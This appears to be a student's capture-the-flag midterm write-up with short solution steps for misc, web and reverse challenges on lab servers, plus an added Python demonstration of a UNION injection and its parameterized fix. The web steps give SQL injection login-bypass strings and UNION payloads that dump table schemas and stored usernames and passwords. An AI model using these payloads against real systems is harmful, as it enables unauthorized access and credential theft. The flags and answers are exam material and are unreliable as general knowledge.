# Hands-on Midterm Exam WriteUp
## Misc
### Real File
1. Rename the file so that it has a PNG extension.
2. Find the CTF flag in the image.
---
## Web
### 木票豆頁 (Header)
1. Find the flag in the header.

### SQL In啦 (SQL In)
http://10.101.2.61:10006/
1. Enter "' OR ''=''-- " for both the username and the password.
### WarmUp
1. Find the robots.txt page
2. http://10.101.2.28:8000/robots.txt
3. https://tabby.tw/fllllllaaaggggggggg.html
4. CTF{W0w_u_kn0w_f1ag_her3}
### 快還要更快 (Fast, and Even Faster)
1. Change the latter part of the URL to index.php.

### Hack me if u can
http://10.101.2.61:10002/
1. For the username and password, enter:
2. anything 'or'1'='1
3. CTF{SQLsAibpssFOnAX~}
### Haiyaaaaaaaaaaaaaaaa
http://10.101.2.61:10005/
1. Open cmd
2. curl http://10.101.2.61:10005/
3. Find the flag
### 安全程式設計很重要 (Secure Programming Is Important)
Use curl and an SQL UNION statement to perform the SQL injection.
1. curl -X POST http://10.101.2.61:10007/index.php?id=1
2. http://10.101.2.61:10007/index.php?id=1 union select 1,2, sql FROM sqlite_master; -- -
3. http://10.101.2.61:10007/index.php?id=1 union select id,username, password FROM member; -- -
```sql
news member
CREATE TABLE "member" ( "id" INTEGER NOT NULL, "username" TEXT, "password" TEXT, PRIMARY KEY("id") )
Title: 2
CREATE TABLE "news" ( "id" INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, "title" TEXT, "content" TEXT )
Title: 2
CREATE TABLE sqlite_sequence(name,seq)
```
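
Why the UNION payloads above work, and how binding the parameter stops them: the following is an added example, not part of the original write-up or the challenge's own code. It assumes the page builds a three-column query on `news` by concatenating `id` (inferred from the three-column UNION); the function names and the sample rows are constructed for illustration.

```python
import sqlite3

# Payloads copied from the write-up steps (the part after "id=").
DUMP_SCHEMA = "1 union select 1,2, sql FROM sqlite_master; -- -"
DUMP_MEMBERS = "1 union select id,username, password FROM member; -- -"

def make_db():
    """Constructed in-memory database using the schema dumped above."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE "member" ("id" INTEGER NOT NULL, "username" TEXT,
                               "password" TEXT, PRIMARY KEY("id"));
        CREATE TABLE "news" ("id" INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
                             "title" TEXT, "content" TEXT);
        INSERT INTO member VALUES (1, 'admin', 'constructed-secret');
        INSERT INTO news (title, content) VALUES ('Hello', 'First post');
    """)
    return db

def news_vulnerable(db, raw_id):
    # Weak form: id is concatenated into the SQL text, so everything after
    # the number is parsed as SQL and the UNION rows join the result set.
    query = "SELECT id, title, content FROM news WHERE id = " + raw_id
    return db.execute(query).fetchall()

def news_hardened(db, raw_id):
    # Corrected form: accept only an integer, then bind it as a parameter
    # so the value can never change the structure of the statement.
    try:
        news_id = int(raw_id)
    except ValueError:
        return []
    query = "SELECT id, title, content FROM news WHERE id = ?"
    return db.execute(query, (news_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for label, value in [("normal", "1"), ("schema", DUMP_SCHEMA),
                         ("members", DUMP_MEMBERS)]:
        print(label, "vulnerable:", news_vulnerable(db, value))
        print(label, "hardened:  ", news_hardened(db, value))
```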
---
## Reverse
### 炎の呼吸 (Flame Breathing)
Rename the file so that it has a txt extension, then find the CTF flag in the text.